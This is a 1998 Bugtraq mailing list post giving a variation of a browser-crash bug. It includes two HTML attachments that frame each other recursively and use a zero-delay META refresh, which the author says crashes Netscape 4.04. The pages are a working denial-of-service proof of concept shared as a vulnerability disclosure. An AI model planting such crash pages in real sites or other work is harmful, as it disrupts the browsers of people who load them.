Bugtraq mailing list archives
Re: IE 4 Bug (Crash with frames), Variation
From: whizpig () TIR COM (whiz)
Date: Sat, 28 Mar 1998 22:14:22 -0500
--=====================_891159262==_
Content-Type: text/plain; charset="us-ascii"
Heres a variation of the IE 4 Bug. It crashes Netscape 4.04 pretty fast.
The most important part is <META HTTP-EQUIV="REFRESH" CONTENT="0;
URL=test.htm"> in test2.htm. Without this Netscape won't crash, but just
load 4 frames.
--=====================_891159262==_
Content-Type: text/html; charset="us-ascii"
Content-Disposition: attachment; filename="test.htm"
<HTML>
<HEAD>
<TITLE>Netscape 4.04 bug</TITLE>
</HEAD>
<FRAMESET ROWS="*,*" border=1>
<frame SRC="test2.htm">
<frame SRC="test2.htm">
</FRAMESET>
<BODY>
</BODY>
</HTML>
--=====================_891159262==_
Content-Type: text/html; charset="us-ascii"
Content-Disposition: attachment; filename="test2.htm"
<HTML>
<HEAD>
<TITLE>Netscape 4.04 bug</TITLE>
<META HTTP-EQUIV="REFRESH" CONTENT="0; URL=test.htm">
</HEAD>
<FRAMESET ROWS="*,*" border=1>
<frame SRC="test.htm">
<frame SRC="test.htm">
</FRAMESET>
<BODY>
test
</BODY>
</HTML>
--=====================_891159262==_
Content-Type: text/plain; charset="us-ascii"
--=====================_891159262==_--
Current thread:
- Re: IE 4 Bug (Crash with frames), Variation whiz (Mar 28)
